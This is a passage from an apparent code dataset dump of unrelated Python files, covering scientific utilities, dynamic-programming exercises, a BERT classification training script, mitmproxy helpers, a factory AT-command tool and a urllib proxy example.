+ 3)\n yield (w, start, start + width)\n start += width\n","sub_path":"jieba/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"196538052","text":"\"\"\"Reads LAMMPS log file. Output the averages. 
\"\"\"\n\nimport argparse\nimport pandas\nfrom flowerpack.io.read_log import read_log\n\n\ndef main():\n\n # Command-line input.\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"input\", help=\"Path of the log file.\")\n args = parser.parse_args()\n\n log = read_log(args.input)\n\n #Temp Press Lx Ly Lz Density E_mol E_pair PotEng KinEng TotEng\n mean_temp = log[\"Temp\"].mean()\n #mean_press = log[\"Press\"].mean()\n #mean_toteng = log[\"TotEng\"].mean()\n #mean_poteng = log[\"PotEng\"].mean()\n #mean_e_vdwl = log[\"E_vdwl\"].mean()\n #mean_e_coul = log[\"E_coul\"].mean()\n #mean_e_pair = log[\"E_pair\"].mean()\n #mean_e_bond = log[\"E_bond\"].mean()\n #mean_e_angle = log[\"E_angle\"].mean()\n #mean_e_dihed = log[\"E_dihed\"].mean()\n #mean_e_impro = log[\"E_impro\"].mean()\n #mean_e_long = log[\"E_long\"].mean()\n #mean_e_tail = log[\"E_tail\"].mean()\n mean_lx = log[\"Lx\"].mean()\n mean_ly = log[\"Ly\"].mean()\n mean_lz = log[\"Lz\"].mean()\n\n # Writing the output.\n with open(\"output_averages.csv\", \"a\") as file:\n file.write(\"{},{},{},{},{}\\n\".format(\n args.input, mean_temp, mean_lx, mean_ly, mean_lz))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"flowerpack/analyze/log_average.py","file_name":"log_average.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"583607952","text":"import os\nimport math\nimport platform\n\nload = 0\nmeasure = 0\nfcj = 0\ng = 9.80665\nflag1 = False\nflag2 = False\nf = 0\narea = 0\n\ndef area_p(p):\n \"\"\" Return area based on perimeter of a circunference. \"\"\"\n math.fabs(p)\n return round((p * p) / (4 * math.pi),2)\n\ndef area_d(d):\n \"\"\" Return area based on perimeter of a circunference. \"\"\"\n math.fabs(d)\n return round((math.pi * d * d) / 4,2)\n\ndef get_force(load):\n \"Return the force in newtons\"\n return round(load * g, 2)\n\ndef get_fcj(f, a):\n \"\"\" Return the concrete resistence. \"\"\"\n return round(f / a, 2)\n\ndef cls():\n \" Clear the screen. \"\n if platform.system() == \"Windows\":\n os.system('cls')\n else:\n os.system('clear')\n\nwhile flag1 == False:\n print(\" \")\n print(\"--- COMANDOS ---\")\n print(\" \")\n print(\"1 - Novo cálculo.\")\n print(\"2 - Limpar tela.\")\n print(\"3 - Sair.\")\n print(\" \")\n \n opt = int(input(\"O que deseja fazer? \"))\n\n if opt == 1:\n print(\" \")\n load = float(input(\"Insira o valor da carga em (kg): \"))\n f = get_force(load)\n \n print(\" \")\n print(\"Agora, escolha um método de cálculo...\")\n print(\" \")\n print(\"--- MÉTODOS DE CÁLCULO ---\")\n print(\" \")\n print(\"4 - Utilizando o perímetro.\")\n print(\"5 - Utilizando o diâmetro.\")\n print(\" \")\n\n flag2 = False\n \n while flag2 == False:\n print(\" \")\n opt = int(input(\"Qual método deseja utilizar? 
\"))\n \n if opt == 4:\n print(\" \")\n measure = float(input(\"Insira o valor do perímetro em (mm): \"))\n roundarea = area_p(measure)\n fcj = get_fcj(f, area)\n flag2 = True\n elif opt == 5:\n print(\" \")\n measure = float(input(\"Insira o valor do diâmetro em (mm): \"))\n area = area_d(measure)\n fcj = get_fcj(f, area)\n flag2 = True\n else:\n print(\" \")\n print(\"Opção inválida...\")\n\n print(\" \")\n print(\"--- RESULTADOS ---\")\n print(\" \")\n print(\"Força: \", f, \" (N)\")\n print(\"Area: \", area, \" (mm²)\")\n print(\"fcj: \", fcj, \" (MPa)\") \n \n elif opt == 2:\n cls()\n elif opt == 3:\n flag1 = True\n os._exit(1)\n else:\n print(\" \")\n print(\"Opcao inválida, selecione outra...\")\n \n\n\n \n","sub_path":"concrete_resistence.py","file_name":"concrete_resistence.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"341511921","text":"from astropy import constants\nimport itertools\nimport numpy as np\nfrom scipy import integrate\n\n\"\"\"\n----------------------------------------------------------------------------------------------------------------\nFrom cloudyfsps written by Nell Byler.\n(Source https://github.com/nell-byler/cloudyfsps/blob/master/cloudyfsps/generalTools.py\n retrieved in October 2019)\n----------------------------------------------------------------------------------------------------------------\n\"\"\"\n\n\ndef calc_LogU(nuin0, specin0, nh, T, mstar=1.0):\n '''\n Claculates the number of lyman ionizing photons for given a spectrum\n Input spectrum must be in ergs/s/Hz!!\n Q = int(Lnu/hnu dnu, nu_0, inf) , number of hydrogen ionizing photons\n mstar is in units of solar mass\n Rin is in units of cm-3\n nh is in units of cm-3\n '''\n\n c = constants.c.cgs.value # cm/s\n h = constants.h.cgs.value # erg/s\n alpha = 2.5e-13*((T/(10**4))**(-0.85)) # cm3/s\n lam_0 = 911.6 * 1e-8 # Halpha wavelength in cm\n\n nuin = np.asarray(nuin0)\n specin = np.asarray(specin0)\n nu_0 = c / lam_0\n inds, = np.where(nuin >= nu_0)\n hlam, hflu = nuin[inds], specin[inds]\n nu = hlam[::-1]\n f_nu = hflu[::-1]\n integrand = f_nu / (h * nu)\n logQ = np.log10(integrate.simps(integrand, x=nu)*mstar) \n Rin = (3 * (10 ** logQ) / (4 * np.pi * nh * nh * alpha)) ** (1. 
\n\n\ndef air_to_vac(inpt, no_uv_conv=True):\n    \"\"\"\n    from Morton 1991\n    preserves order of input array\n    \"\"\"\n    if type(inpt) is float:\n        wl = np.array([inpt])\n    else:\n        wl = np.asarray(inpt)\n    to_vac = lambda lam: (6.4328e-5 + (2.94981e-2/(146.0-(1.0e4/lam)**2.0)) + (2.554e-4/(41.0-(1.0e4/lam)**2.0)))*lam + lam\n    if no_uv_conv:\n        outpt = np.array([to_vac(lam) if lam > 2000.0 else lam for lam in wl])\n    else:\n        outpt = to_vac(wl)\n    return outpt\n\n\ndef sym_to_name(val=None):\n    elem_keys = dict(He=\"helium\",\n                     C=\"carbon\",\n                     N=\"nitrogen\",\n                     O=\"oxygen\",\n                     Ne=\"neon\",\n                     Mg=\"magnesium\",\n                     Si=\"silicon\",\n                     S=\"sulphur\",\n                     Ar=\"argon\",\n                     Ca=\"calcium\",\n                     Fe=\"iron\",\n                     F=\"fluorine\",\n                     Na=\"sodium\",\n                     Al=\"aluminum\",\n                     Cl=\"chlorine\",\n                     Ni=\"nickel\",\n                     P=\"phosphorus\",\n                     Sc=\"scandium\",\n                     K=\"potassium\",\n                     Ti=\"titanium\",\n                     V=\"vanadium\",\n                     Cr=\"chromium\",\n                     Co=\"cobalt\",\n                     Cu=\"copper\",\n                     Mn=\"manganese\",\n                     Zn=\"zinc\")\n    if val is None:\n        return elem_keys\n    else:\n        try:\n            return elem_keys[val.title()]\n        except KeyError:\n            print(\"element not in \", elem_keys.keys())\n\n\ndef grouper(n, iterable):\n    \"\"\"\n    Iterate through array in groups of n\n    \"\"\"\n    it = iter(iterable)\n    while True:\n        chunk = tuple(itertools.islice(it, n))\n        if not chunk:\n            return\n        yield chunk\n","sub_path":"powderday/nebular_emission/cloudy_tools.py","file_name":"cloudy_tools.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
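For reference, the quantities computed by calc_LogU in the cloudy_tools.py record above correspond to the following relations (a LaTeX transcription of the code's own formulas; alpha is the temperature-scaled recombination coefficient hard-coded in the function):

Q = \int_{\nu_0}^{\infty} \frac{L_\nu}{h\nu}\,d\nu, \qquad
R_{\mathrm{in}} = \left(\frac{3Q}{4\pi n_{\mathrm{H}}^{2}\,\alpha}\right)^{1/3}, \qquad
U = \frac{Q}{4\pi R_{\mathrm{in}}^{2}\,n_{\mathrm{H}}\,c}, \qquad
\alpha = 2.5\times 10^{-13}\,\left(T/10^{4}\right)^{-0.85}\ \mathrm{cm^{3}\,s^{-1}}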
+{"seq_id":"450043005","text":"# A collection of buy-and-sell-stock problems\n'''\n1. Given an array where the i-th element is the price of a given stock on day i.\nIf you may complete at most one transaction (buy one share and sell it), find the maximum profit.\nIdea 1: dp[i][j] is the maximum profit on day i when the holding state is j.\nj takes only two values: 0 means not holding the stock, 1 means holding it.\nThen dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], -prices[i]); because only one transaction is allowed, dp[i-1][0] must not be added here\nInitial values: not holding on day 0, dp[0][0]=0; holding on day 0, dp[0][1]=-prices[0]\n'''\ndef maxProfit(prices):\n    if len(prices)<2:\n        return 0\n    n = len(prices)\n    dp = [[0]*2 for _ in range(n)]\n    dp[0][0] = 0\n    dp[0][1] = -prices[0]\n    for i in range(1, n):\n        dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n        dp[i][1] = max(dp[i-1][1], -prices[i])\n    return dp[-1][0]\n# Consider state compression: dp[i] depends only on dp[i-1]\ndef maxProfit2(prices):\n    n = len(prices)\n    if n<2:\n        return 0\n    dp = [0]*2\n    dp[0] = 0\n    dp[1] = -prices[0]\n    for i in range(1, n):\n        dp[0] = max(dp[0], dp[1]+prices[i])\n        dp[1] = max(dp[1], -prices[i])\n    return dp[0]\n\n'''\n2. You may complete as many transactions as you like (buy and sell the stock multiple times),\nbut you may not engage in multiple transactions at the same time (you must sell the previous share before buying again).\nIdea: dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\ndp[0][0] = 0, dp[0][1] = -prices[0]\n'''\ndef maxProfitII(prices):\n    n = len(prices)\n    if n<2:\n        return 0\n    dp = [[0]*2 for _ in range(n)]\n    dp[0][0] = 0\n    dp[0][1] = -prices[0]\n    for i in range(1, n):\n        dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n        dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\n    return dp[-1][0]\n# State compression works here too: dp[i] depends only on dp[i-1]\n\n'''\n3. At most two transactions may be completed.\nNote: you must sell the previous share before buying again\nIdea: redefine the state equations\ndp[i][0] means no transaction has happened\ndp[i][1] means the first share has been bought\ndp[i][2] means the first share has been sold\ndp[i][3] means the second share has been bought\ndp[i][4] means the second share has been sold\nSee the code for the transition equations\nInitialization: on day 0 only the first two states are initialized, while state 3 (holding\nfor the second time) can only be assigned an impossible value.\n'''\ndef maxProfitIII(prices):\n    n = len(prices)\n    if n<2:\n        return 0\n    dp = [[0]*5 for _ in range(n)]\n    dp[0][1] = -prices[0]\n    for i in range(n):\n        dp[i][3] = float(\"-inf\")\n    for i in range(1, n):\n        dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i])\n        dp[i][2] = max(dp[i-1][2], dp[i-1][1]+prices[i])\n        dp[i][3] = max(dp[i-1][3], dp[i-1][2]-prices[i])\n        dp[i][4] = max(dp[i-1][4], dp[i-1][3]+prices[i])\n    # The maximum can only occur while not holding the stock\n    return max(0, dp[-1][2], dp[-1][4])\n# State compression: dp[i] depends only on dp[i-1]\n\n'''\n4. At most k transactions may be completed\nNote: you must sell the previous share before buying again\n'''\n\n'''\n5. You may complete as many transactions as you like (buy and sell the stock multiple times) under these constraints:\n1) you must sell the previous share before buying again;\n2) after you sell a share you cannot buy on the next day (a cooldown of 1 day)\nIdea: add one more state; j takes three values:\n0 means not holding, 1 means holding, 2 means in cooldown\nTransition equations:\ndp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][2]-prices[i])\ndp[i][2] = dp[i-1][0]\n'''\ndef maxProfitV(prices):\n    n = len(prices)\n    if n<2:\n        return 0\n    dp = [[0]*3 for _ in range(n)]\n    dp[0][1] = -prices[0]\n    for i in range(1, n):\n        dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n        dp[i][1] = max(dp[i-1][1], dp[i-1][2]-prices[i])\n        dp[i][2] = dp[i-1][0]\n    return max(dp[-1][0], dp[-1][2])\n# Consider state compression: dp[i] depends only on dp[i-1]\n\n'''\n6. You may trade an unlimited number of times, but every transaction costs a fee.\nIf you have already bought a share, you cannot buy again before selling it.\nIdea: deduct the fee when the share is bought\nTransition equations:\ndp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\ndp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i]-fee)\n'''\ndef maxProfitVI(prices, fee):\n    n = len(prices)\n    if n<2:\n        return 0\n    dp = [[0]*2 for _ in range(n)]\n    dp[0][1] = -prices[0]-fee\n    for i in range(1, n):\n        dp[i][0] = max(dp[i-1][0], dp[i-1][1]+prices[i])\n        dp[i][1] = max(dp[i-1][1], dp[i-1][0]-prices[i]-fee)\n    return dp[-1][0]","sub_path":"20200305/bugAndSellStocks.py","file_name":"bugAndSellStocks.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"230965538","text":"import matplotlib.pyplot as plt \n\nemp_ages = [22,45,30,59,58,56,57,45,43,43,50,40,34,33,25,19] \nbins = [0,10,20,30,40,50,60] \n\nplt.hist(emp_ages, bins, histtype='bar', rwidth=0.8, color='cyan') \n\nplt.xlabel('employee ages') \nplt.ylabel('no. of employees') \nplt.title('ORACLE CORP') \n\nplt.legend() \nplt.show()\n","sub_path":"PY10/Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"122095433","text":"\"\"\"Add last failed login date\n\nRevision ID: e9fd4b35dee9\nRevises: 19aba10b42ed\nCreate Date: 2020-02-02 15:20:19.576515\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e9fd4b35dee9'\ndown_revision = '19aba10b42ed'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('users', sa.Column('last_failed_login', sa.DateTime(), nullable=False, server_default='2000-01-01 00:00:00'))\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('users', 'last_failed_login')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e9fd4b35dee9_add_last_failed_login_date.py","file_name":"e9fd4b35dee9_add_last_failed_login_date.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"625588968","text":"import factoryStation\nimport operations.sendATCommand\n\n\nclass unlockEngMode(operations.sendATCommand.sendATCommand):\n '''Unlock engineering mode'''\n\n def __init__(self,factoryStation, options):\n self.name = 'unlockEngMode'\n self.description = unlockEngMode.__doc__\n self.ATcmd = 'AT%IPWD=\"iceraempwd\",0'\n super(unlockEngMode,self).__init__(factoryStation, options)\n\n# ------------------------------------------------- \n# Testing \n# -------------------------------------------------\nif __name__ == \"__main__\":\n\n testMode = True\n \n fs = factoryStation.factoryStation(None, testMode) # default factoryStation object\n options = {'ATtool' : 'atcmd-itf'}\n fo = unlockEngMode( fs, options )\n fo.postResult( fo.do() )\n","sub_path":"ManuFacturingLine/operations/unlockEngMode.py","file_name":"unlockEngMode.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"74724379","text":"from pycm import *\nimport nltk\nnltk.download('punkt')\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom collections import Counter\nimport pickle\nimport sys\nfrom glob import glob \nimport math\nimport shutil\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data.dataset\nimport torch.utils.data.dataloader\nimport torchvision.transforms as visionTransforms\nimport PIL.Image as Image\nfrom torchvision.transforms import ToTensor,ToPILImage\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport os\nimport io\nimport csv\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndfTrain = pd.read_csv(\"/root/combined.csv\", index_col=None)\ndfTest=pd.read_csv(\"/root/test.csv\",escapechar = \"\\\\\",quoting = csv.QUOTE_NONE)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\nlabelEncoder=preprocessing.LabelEncoder()\nencodedLabelListTrain=(labelEncoder.fit_transform(dfTrain[\"Label\"]))\ndfTrain[\"Label\"]=encodedLabelListTrain\n\nfrom torch.utils.data import WeightedRandomSampler\nfreqLabels=torch.tensor(dfTrain['Label'].value_counts().sort_index(),dtype=torch.double)\nweightClass=freqLabels/freqLabels.sum()\nweightClass= 1/weightClass\nweightClass=(weightClass).tolist()\nsampleWeights=[weightClass[i] for i in dfTrain['Label']]\ntrainSampler=WeightedRandomSampler(sampleWeights,len(dfTrain))\n\nfrom transformers import BertTokenizer, AutoTokenizer, BertModel, AutoModel\nfrom torch.utils.data import Dataset, DataLoader\n\nclass QuoraDataset(Dataset):\n\n def __init__(self,dataframe,bertTokenizer,maxLength,device):\n self.data=dataframe\n self.bertTokenizer=bertTokenizer\n self.maxLength=maxLength\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self,idx):\n #print(idx)\n self.productDescription=str(self.data.loc[idx,\"Text\"])\n self.label=self.data.loc[idx,\"Label\"]\n\n 
self.encodedInput=self.bertTokenizer.encode_plus(text=self.productDescription,padding='max_length',truncation=\"longest_first\",max_length=self.maxLength,return_tensors='pt',return_attention_mask=True,return_token_type_ids=True).to(device)\n \n return self.encodedInput,self.label\n\nclass FlipkartTestDataset(Dataset):\n\n def __init__(self,dataframe,bertTokenizer,maxLength,device):\n self.data=dataframe\n self.bertTokenizer=bertTokenizer\n self.maxLength=maxLength\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self,idx):\n self.productDescription=str(self.data.iloc[idx,1])+str(self.data.iloc[idx,2])+str(self.data.iloc[idx,3])\n\n self.encodedInput=self.bertTokenizer.encode_plus(text=self.productDescription,padding='max_length',truncation=\"longest_first\",max_length=self.maxLength,return_tensors='pt',return_attention_mask=True,return_token_type_ids=True).to(device)\n \n return self.encodedInput\n\ntokenizer = AutoTokenizer.from_pretrained('distilbert-base-uncased')\nquoraTrainDataset=QuoraDataset(dataframe=dfTrain,bertTokenizer=tokenizer,maxLength=128,device=device)\nflipkartTestDataset=FlipkartTestDataset(dataframe=dfTest,bertTokenizer=tokenizer,maxLength=128,device=device)\ntrainLoader=torch.utils.data.DataLoader(quoraTrainDataset,batch_size=8,sampler=trainSampler)\ntestLoader=torch.utils.data.DataLoader(flipkartTestDataset,batch_size=8,shuffle=False)\n\nclass BERTOnly(nn.Module):\n def __init__(self,preTrainedBert,embeddingDimension=768,numClasses=1):\n super(BERTOnly,self).__init__()\n\n self.embDim=embeddingDimension\n self.numClasses=numClasses\n\n self.dropoutLayer=nn.Dropout(p=0.5)\n self.bert=self.freezeBert(preTrainedBert)\n self.fc1=nn.Linear(self.embDim,9919)\n\n def forward(self,input):\n bertOutput=self.bert(input_ids=input['input_ids'].squeeze(dim=1),attention_mask=input['attention_mask'].squeeze(dim=1)).last_hidden_state[:, 0, :]\n #print(bertOutput.shape)\n classificationOutput=self.fc1(self.dropoutLayer(bertOutput))\n #print(classificationOutput.shape)\n #classificationOutput=classificationOutput.reshape((classificationOutput.size(0)))\n #print(classificationOutput.shape)\n return classificationOutput\n\n def freezeBert(self,model):\n return model\n\nmodel = AutoModel.from_pretrained(\"distilbert-base-uncased\")\nbertOnly=BERTOnly(preTrainedBert=model)\nbertOnly.to(device)\nsoftmaxLoss = nn.CrossEntropyLoss()\noptimizer = optim.Adam(bertOnly.parameters(), lr=0.00001)\n\ndef Average(lst): \n return sum(lst) / len(lst) \n\ndef train_model(model,epochs):\n\n trainBatchCount=0\n testBatchCount=0\n\n avgTrainAcc=[]\n avgValidAcc=[]\n trainAcc=[]\n validAcc=[]\n trainLosses=[]\n validLosses=[]\n avgTrainLoss=[]\n avgValidLoss=[]\n\n\n for i in range(epochs):\n\n print(\"Epoch:\",i)\n\n model.train()\n print(\"Training.....\")\n for batch_idx,(data,targets) in enumerate(trainLoader):\n\n trainBatchCount=trainBatchCount+1\n\n targets=targets.to(device)\n\n optimizer.zero_grad()\n\n scores=model(data)\n \n loss=softmaxLoss(scores,targets)\n\n loss.backward()\n\n optimizer.step()\n\n trainLosses.append(float(loss))\n\n \n correct=0\n total=0\n total=len(targets)\n\n\n predictions=torch.argmax(scores,dim=1)\n correct = (predictions==targets).sum()\n acc=float((correct/float(total))*100)\n\n trainAcc.append(acc)\n\n if ((trainBatchCount%200)==0):\n\n print(\"Targets:-\",targets)\n print(\"Predictions:-\",predictions)\n\n print(\"Epoch:\",i)\n print(\"Batch:\",batch_idx)\n print('Loss: {} Accuracy: {} %'.format(loss.data, acc))\n\t\n\n #model.eval()\n 
#print(\"Validating.....\")\n #for data,targets in valLoader:\n\n #testBatchCount=testBatchCount+1\n\n #targets=targets.to(device=device)\n\n #scores=model(data)\n\n #loss=softmaxLoss(scores,targets)\n\n #validLosses.append(float(loss))\n\n #testCorrect=0\n #testTotal=0\n\n #_,predictions=scores.max(1)\n\n #testCorrect = (predictions==targets).sum()\n #testTotal=predictions.size(0)\n\n #testAcc=float((testCorrect/float(testTotal))*100)\n\n #validAcc.append(testAcc)\n\n #if ((testBatchCount%200)==0):\n\n #print('Loss: {} Accuracy: {} %'.format(float(loss), testAcc))\n \n\n trainLoss=Average(trainLosses)\n #validLoss=Average(validLosses)\n avgTrainLoss.append(trainLoss)\n #avgValidLoss.append(validLoss)\n tempTrainAcc=Average(trainAcc)\n #tempTestAcc=Average(validAcc)\n avgTrainAcc.append(tempTrainAcc)\n #avgValidAcc.append(tempTestAcc)\n\n print(\"Epoch Number:-\",i,\" \",\"Training Loss:-\",\" \",trainLoss,\"Training Acc:-\",\" \",tempTrainAcc)\n\n trainAcc=[]\n ValidAcc=[]\n trainLosses=[]\n validLosses=[]\n\n return model,avgTrainLoss,avgTrainAcc\n\nbertOnly,avgTrainLoss,avgTrainAcc = train_model(bertOnly,3)\n\n\ndef checkClassificationMetrics(loader,model):\n\n completeTargets=[]\n completePreds=[]\n\n correct=0\n total=0\n model.eval()\n\n with torch.no_grad():\n for data in loader:\n\n #targets=targets.to(device=device)\n\n scores=model(data)\n _,predictions=scores.max(1)\n\n #targets=targets.tolist()\n predictions=predictions.tolist()\n\n #completeTargets.append(targets)\n completePreds.append(predictions)\n\n #completeTargetsFlattened=[item for sublist in completeTargets for item in sublist]\n completePredsFlattened=[item for sublist in completePreds for item in sublist]\n\n #cm = ConfusionMatrix(actual_vector=completeTargetsFlattened, predict_vector=completePredsFlattened)\n return completePredsFlattened\n\nCM=checkClassificationMetrics(testLoader,bertOnly)\n\nfinalResult=labelEncoder.inverse_transform(CM)\npid=list(dfTest.iloc[:,0])\n\ntempdf=pd.DataFrame(list(zip(pid, finalResult)),\n columns =['PRODUCT_ID', 'BROWSE_NODE_ID'])\n\ntempdf.to_csv(\"Results1.csv\")\n\n","sub_path":"amazonML.py","file_name":"amazonML.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"152309408","text":"from __future__ import absolute_import, print_function, division\n\nfrom mitmproxy import controller\nfrom netlib import wsgi\nfrom netlib import version\nfrom netlib.http import http1\n\n\nclass AppRegistry:\n def __init__(self):\n self.apps = {}\n\n def add(self, app, domain, port):\n \"\"\"\n Add a WSGI app to the registry, to be served for requests to the\n specified domain, on the specified port.\n \"\"\"\n self.apps[(domain, port)] = wsgi.WSGIAdaptor(\n app,\n domain,\n port,\n version.MITMPROXY\n )\n\n def get(self, request):\n \"\"\"\n Returns an WSGIAdaptor instance if request matches an app, or None.\n \"\"\"\n if (request.host, request.port) in self.apps:\n return self.apps[(request.host, request.port)]\n if \"host\" in request.headers:\n host = request.headers[\"host\"]\n return self.apps.get((host, request.port), None)\n\n\nclass StreamLargeBodies(object):\n def __init__(self, max_size):\n self.max_size = max_size\n\n def run(self, flow, is_request):\n r = flow.request if is_request else flow.response\n expected_size = http1.expected_http_body_size(\n flow.request, flow.response if not is_request else None\n )\n if not r.raw_content and not (0 <= expected_size <= self.max_size):\n # r.stream 
may already be a callable, which we want to preserve.\n r.stream = r.stream or True\n\n\nclass ClientPlaybackState:\n def __init__(self, flows, exit):\n self.flows, self.exit = flows, exit\n self.current = None\n self.testing = False # Disables actual replay for testing.\n\n def count(self):\n return len(self.flows)\n\n def done(self):\n if len(self.flows) == 0 and not self.current:\n return True\n return False\n\n def clear(self, flow):\n \"\"\"\n A request has returned in some way - if this is the one we're\n servicing, go to the next flow.\n \"\"\"\n if flow is self.current:\n self.current = None\n\n def tick(self, master):\n if self.flows and not self.current:\n self.current = self.flows.pop(0).copy()\n if not self.testing:\n master.replay_request(self.current)\n else:\n self.current.reply = controller.DummyReply()\n master.request(self.current)\n if self.current.response:\n master.response(self.current)\n","sub_path":"mitmproxy/flow/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"603043131","text":"class Job:\n def __init__(self,part):\n self.name=None\n self.dmg=None\n self.hp=None\n self.items=[\"Easter Egg\"]\n\n if part==\"warrior\":\n self.name=\"Warrior\"\n self.dmg=25\n self.hp=125\n self.items=[\"Sword\",\"Healing Potion\",\"Light Armor\"]\n\n if part==\"wizard\":\n self.name=\"Wizard\"\n self.dmg=10\n self.hp=75\n self.items=[\"Magic Wand\",\"Healing Potion\",\"Robes\"]\n\n if part==\"bard\":\n self.name=\"Bard\"\n self.dmg=10\n self.hp=50\n self.items=[\"Lute\",\"Healing Potion\",\"Robes\"]\n\n def __str__(self):\n I= \"--\"+self.name+\"-- \\n\"\n I+= \"Damage: \"+str(self.dmg)+\"\\n\"\n I+= \"Health: \"+str(self.hp)+\"\\n\"\n I+= \"Starting Items: \\n\"\n for item in self.items:\n I+= \"\\t\" + item + \"\\n\"\n return I\n","sub_path":"Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"515457071","text":"#!/usr/bin/env python\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\nwith open('README.md') as f:\n long_description = f.read()\n\n\ndef get_version():\n return open('version.txt', 'r').read().strip()\n\n\nclass NumpyBuildExt(build_ext):\n \"\"\"build_ext command for use when numpy headers are needed.\"\"\"\n\n def run(self):\n\n # Import numpy here, only when headers are needed\n import numpy # noqa\n\n # Add numpy headers to include_dirs\n self.include_dirs.append(numpy.get_include())\n\n # Call original build_ext command\n build_ext.run(self)\n\n\nsetup(name='dativascrubber',\n version=get_version(),\n description='Dativa scrubber for automatic file cleansing',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://bitbucket.org/dativa4data/scrubber/',\n author='Dativa',\n author_email='hello@dativa.com',\n license='MIT',\n zip_safe=False,\n packages=['dativa.analyzer',\n 'dativa.scrubber'],\n include_package_data=True,\n setup_requires=[\n 'setuptools>=38.6.0',\n 'wheel>=0.31.0',\n 'numpy>=1.13.3'],\n install_requires=['setuptools>=38.6.0',\n 'pandas==0.23.4',\n 'numpy>=1.13.3',\n 'python-levenshtein>=0.12.0',\n 'Cython>=0.27.3',\n 'pycryptodome>=3.7.2',\n 'dativatools>=2.9.16',],\n scripts=['bin/fanalyzer'],\n test_suite='nose.collector',\n tests_require=['nose', 'coverage'],\n cmdclass={'build_ext': NumpyBuildExt},\n 
ext_modules=[Extension(name=\"dativa.scrubber.distance\", sources=[\"dativa/scrubber/distance.pyx\"])],\n      classifiers=['Development Status :: 5 - Production/Stable',\n                   'Intended Audience :: Developers',\n                   'Topic :: Software Development :: Libraries',\n                   'License :: OSI Approved :: MIT License',\n                   'Programming Language :: Python :: 3.6'],\n      keywords='dativa, data cleansing, data pipeline'\n      )\n","sub_path":"pypi_install_script/dativascrubber-1.1.89.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"516767683","text":"import urllib.request\n\ndef handler_openner():\n\n    # The built-in urlopen has no proxy support, so we add a handler ourselves\n    url = \"http://www.baidu.com\"\n\n    # Internally, urlopen just builds an HTTPHandler, wraps it in an opener, and opens the URL\n    # urllib.request.urlopen()\n\n    # Template for sending a request through a hand-built handler\n    # handler = urllib.request.HTTPHandler()\n    # opener = urllib.request.build_opener(handler)\n    # response = opener.open(url)\n    # data = response.read().decode(\"utf-8\")\n    # print(data)\n\n    # Route the request through a proxy IP\n    proxy = {\n        \"https\": \"119.101.114.8:9999\"\n    }\n    proxy_handler = urllib.request.ProxyHandler(proxy)\n    opener = urllib.request.build_opener(proxy_handler)\n    try:\n        response = opener.open(url)\n        data = response.read().decode(\"utf-8\")\n        print(data)\n    except Exception as e:\n        